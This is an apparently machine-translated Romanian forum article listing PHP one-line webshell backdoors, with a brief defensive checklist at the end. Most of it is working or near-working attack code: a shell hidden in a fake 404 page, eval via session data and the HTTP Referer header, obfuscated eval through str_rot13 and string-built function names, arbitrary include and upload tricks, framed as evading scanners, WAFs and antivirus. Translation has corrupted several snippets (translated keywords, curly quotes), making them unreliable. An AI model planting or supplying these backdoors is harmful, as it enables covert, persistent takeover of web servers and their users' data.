Tratăm aceste programe PHP backdoor cu o mentalitate de învățare, iar mult cod backdoor PHP ne permite să vedem cât de bine intenționați sunt programatorii.
Backdoor puternic PHP într-o singură propoziție
Acest tip de backdoor permite site-urile web,Administratorii de servere sunt foarte problematici și adesea trebuie să schimbe metodele pentru a efectua diverse detectări, iar multe tehnici noi de scriere nu pot fi descoperite și rezolvate cu metode obișnuite de detecție.
Astăzi vom număra câțiva troieni PHP interesanți.
1. Ascunde poneii PHP folosind 404 pagini:
[mw_shl_code=php,true] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Negăsit</title> </head><body> <h1>Negăsit</h1> <p>URL-ul solicitat nu a fost găsit pe acest server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); antet('HTTP/1.1 404 Negăsit'); ?>[/mw_shl_code]
Pagina 404 este un fișier folosit frecvent pe site, iar puțini oameni îl verifică și modifică după ce este recomandat, așa că îl putem folosi pentru a ascunde ușa din spate.
2. PHP ascuns fără trăsături într-o singură propoziție:
[mw_shl_code=php,true]<?php session_start(); $_POST['cod'] && $_SESSION['codul'] = trim($_POST['cod']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\'])','a'); ?>[/mw_shl_code]
Atribuiți $_POST['cod'] lui $_SESSION['codul'], apoi executați $_SESSION['codul'], evidențiind că nu există cod de semnătură.
Dacă folosești un instrument de scanare pentru a verifica codul, nu va alarma și nu va atinge scopul.
3. Ușa din spate super stealth de PHP:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
Funcția GET singură constituie un troian;
Cum să folosești:
[mw_shl_code=php,true] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
După execuție, directorul curent generează c.php un troian de propoziție, când parametrul A este evaluat, generarea troianului de eroare a eșuat, iar când este afirmat, va raporta și el o eroare, dar va genera un cal troian, care nu poate fi subestimat.
Cerere de nivel, cod pentru a rula backdoor PHP:
Această metodă este implementată cu două fișiere, fișierul 1
[mw_shl_code=php,true]<?php
//1.php antet('Tipul conținut:text/html; Charset=UTF-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
} ?>[/mw_shl_code]
Document 2
[mw_shl_code=php,true]<?php
//2.php antet('Tipul conținut:text/html; Charset=UTF-8′);
//要执行的代码 $code= <<<CODE phpinfo(); COD;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= array( CURLOPT_URL => $url, CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => ADEVĂRAT, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Rulați cod în base64 prin HTTP_REFERER în cererea HTTP pentru a obține efectul backdoor.
Este bine să folosești această idee pentru a ocoli WAF.
4.PHP unealtă generator de ușă din spate
weevely este unul specific PHPSoftware-ul gratuit Webshell poate fi folosit pentru a simula un shell de conexiune similar cu telnet, Weevely este de obicei folosit pentru exploatarea programelor web, ascunderea backdoor-urilor sau metode asemănătoare telnet-ului în loc de gestionarea bazată pe pagini web, codul PHP pe partea de server generat de Weevely este codificat base64, deci poate păcăli software-ul antivirus mainstream și IDS-ul, Odată ce încarci codul de pe partea de server, de obicei îl poți rula direct prin Weevely.
Funcțiile folosite în backdoor sunt funcții de procesare a șirurilor folosite frecvent, iar funcții precum eval și system care sunt folosite ca reguli de inspecție nu vor apărea direct în cod, astfel încât fișierul backdoor poate ocoli verificarea instrumentului de căutare backdoor. Scanarea cu instrumentul de detectare a backdoor web al grupului întunecat arată că fișierul nu este amenințat.
Cele de mai sus reprezintă o introducere generală, iar metodele de utilizare relevante nu sunt prezentate aici, ci o simplă popularizare științifică.
4. Trei troieni PHP deformați într-o singură propoziție Primul:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
A doua
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__'];?>[/mw_shl_code]
Scrie parola http://site/2.php?_=assert&__=eval($_POST['pass']) în cuțitul de bucătărie este "trece".
Dacă folosești datele suplimentare ale cuțitului de bucătărie, acestea sunt mai ascunse, sau poți folosi alte instrumente de injecție, deoarece acestea sunt post-trimise.
Al treilea
[mw_shl_code=php,true] ($b 4dboy= $_POST['b4dboy']) & & @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'adaugă»); [/mw_shl_code]
str_rot13 ("riny") este evaluarea codificată, care evită complet cuvintele-cheie fără a-și pierde efectul, făcând oamenii să vomite sânge!
5. În final, listați câteva uși din spate avansate pentru troieni PHP:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Acces"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; include ($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][nume]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Acces"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
În concluzie, aceste backdoor-uri PHP pot fi descrise ca fiind complete, dacă nu ești atent, cu siguranță vei fi păcălit, iar care este prioritatea principală a articolului nostru astăzi? Punctele cheie se găsesc în rezumatul de mai jos!
Cum să gestionezi backdoor-ul de o singură propoziție în PHP: Punem accent pe câteva puncte cheie, iar dacă citiți acest articol, cred că nu sunteți un neinițiat, așa că nu voi fi prea lung:
- Fii atent la securitate atunci când scrii programe PHP
- Fișierele de log ale serverului ar trebui citite frecvent și salvate frecvent
- Atribuire strictă a permisiunilor pentru fiecare amplasament
- Revizuiri frecvente de securitate în loturi ale fișierelor dinamice și directoarelor
- Învață cum să realizezi un anti-virus manual "Investigație și Ucidere a Judecății Comportamentale"
- Rămâneți aproape sau infiltrați-vă într-o tabără activă de securitate cibernetică
- Chiar și o funcție poate fi folosită ca regulă pentru procesarea ierarhică a mediului serverului
Credem că, atunci când există mai multe site-uri de gestionat și o cantitate mare de date, ar trebui să aplicăm în mod rezonabil unele instrumente auxiliare, dar nu ar trebui să ne bazăm complet pe aceste instrumente, tehnologia se actualizează și se îmbunătățește mereu, cel mai important este să înveți și să înțelegi modul de a gândi în scrierea acestor oameni puternici din spate, iar transpunerea rolurilor îți poate aduce progrese mai mari.
|